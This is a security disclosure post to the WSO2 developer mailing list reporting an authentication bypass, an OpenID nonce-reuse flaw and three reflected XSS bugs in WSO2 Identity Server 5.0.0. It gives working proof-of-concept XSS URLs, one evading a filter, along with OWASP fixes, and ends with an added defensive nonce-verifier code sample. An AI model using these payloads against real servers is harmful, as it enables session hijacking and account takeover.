Hi,

Since I've written several emails to individual persons responsible for WSO2 management and development and haven't got any response, I've finally decided to post to the mailing list:

During penetration testing our Security Team (WCSS CSIRT) discovered serious security vulnerabilities in WSO2 Identity Server version 5.0.0 (latest available on http://wso2.com/products/identity-server/).

1) Identity spoofing/authentication bypass.
An attacker needs to log in to WSO2 IS to obtain a valid HTTP session. Given this session, he/she can request an OpenID assertion from WSO2 IS for _any_ identity (openid.identity). Thus any authenticated user is able to spoof any identity he/she requests in order to log in to the RP as a user of his/her choosing.

2) XSS A - HTML injection
https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e
Note that the filter you use against XSS is easy to evade.
Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet RULE#1 RULE#2

3) XSS B - HTML injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://www.wp.pl&openid.realm=http://www.wp.pl&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://www.wp.pl/test&openid.claimed_id=https://www.wp.pl/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL
It seems there is no filtering/escaping involved there.
Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet RULE#1 RULE#2

4) XSS C - JavaScript injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://www.wp.pl&openid.realm=http://www.wp.pl&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://www.wp.pl/test&openid.claimed_id=https://www.wp.pl/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL
This is direct JavaScript injection; there is no need even to inject HTML tags.
Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#RULE_.233_-_JavaScript_Escape_Before_Inserting_Untrusted_Data_into_JavaScript_Data_Values

As for these XSS bugs, it is very likely that you are vulnerable in many other places as well. Our audit was just as quick as possible. Please apply the above-mentioned OWASP guides to get rid of these XSS problems. Probably any other countermeasures will be ineffective, in particular any custom anti-XSS filters.

5) WSO2 IS breaks an important OpenID specification constraint concerning the "nonce".
A "nonce" must be used only "once", but WSO2 IS allows unlimited use of the same nonce value, see:
http://openid.net/specs/openid-authentication-2_0.html#verify_nonce

thanks,
Bartlomiej Balcerek <[email protected]>
Antoni Klajn <[email protected]>
Wroclaw University of Technology, Poland
Wroclaw Centre for Networking and Supercomputing

_______________________________________________
Dev mailing list
[email protected]
http://wso2.org/cgi-bin/mailman/listinfo/dev
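Regarding point 5, the following is an added example (not WSO2 code, and not from the original post) of how an OpenID 2.0 verifier can enforce single use of a nonce: it parses the nonce format from section 10.1 of the spec (RFC 3339 UTC timestamp, no fractional seconds, followed by ASCII characters), rejects timestamps outside a bounded window, and remembers each accepted nonce for that window so a replay is refused, as section 11.3 describes. It is written in Python as a stand-alone illustration; the class and function names are my own and the nonce values in demo() are constructed.

```python
import re
import threading
from datetime import datetime, timedelta, timezone

# OpenID 2.0 nonce (spec section 10.1): RFC 3339 UTC timestamp with no
# fractional seconds, followed by [A-Za-z0-9]*, at most 255 chars in total,
# e.g. "2005-05-15T17:11:51ZUNIQUE".
_NONCE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)([A-Za-z0-9]*)$")


class NonceVerifier:
    """Accepts each nonce at most once (spec section 11.3). Nonces older than
    the window are rejected outright, so forgetting them after the window
    keeps the seen-set bounded without letting a replay through."""

    def __init__(self, window_seconds=300):
        self.window = timedelta(seconds=window_seconds)
        self._seen = {}            # nonce -> timestamp carried in the nonce
        self._lock = threading.Lock()

    @staticmethod
    def parse_timestamp(nonce):
        """Return the nonce's UTC timestamp, or None if the nonce is malformed."""
        if len(nonce) > 255:
            return None
        m = _NONCE_RE.match(nonce)
        if not m:
            return None
        try:
            return datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        except ValueError:          # e.g. month 13 or day 32
            return None

    def check(self, nonce, now=None):
        """Return (accepted, reason). The same nonce is never accepted twice."""
        now = now or datetime.now(timezone.utc)
        ts = self.parse_timestamp(nonce)
        if ts is None:
            return False, "malformed nonce"
        if abs(now - ts) > self.window:
            return False, "timestamp outside window"
        with self._lock:
            cutoff = now - self.window
            for old in [n for n, t in self._seen.items() if t < cutoff]:
                del self._seen[old]  # expired; already rejected by the window check
            if nonce in self._seen:
                return False, "nonce replayed"
            self._seen[nonce] = ts
        return True, "ok"


def demo():
    """Constructed nonces checked against a fixed clock; returns the reasons."""
    v = NonceVerifier(window_seconds=300)
    now = datetime(2005, 5, 15, 17, 12, 0, tzinfo=timezone.utc)
    nonces = ["2005-05-15T17:11:51ZUNIQUE", "2005-05-15T17:11:51ZUNIQUE",
              "2005-05-15T16:11:51ZOLD", "2005-05-15T17:11:51.5ZX",
              "2005-05-15T17:11:51+00:00X"]
    return [v.check(n, now)[1] for n in nonces]
```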
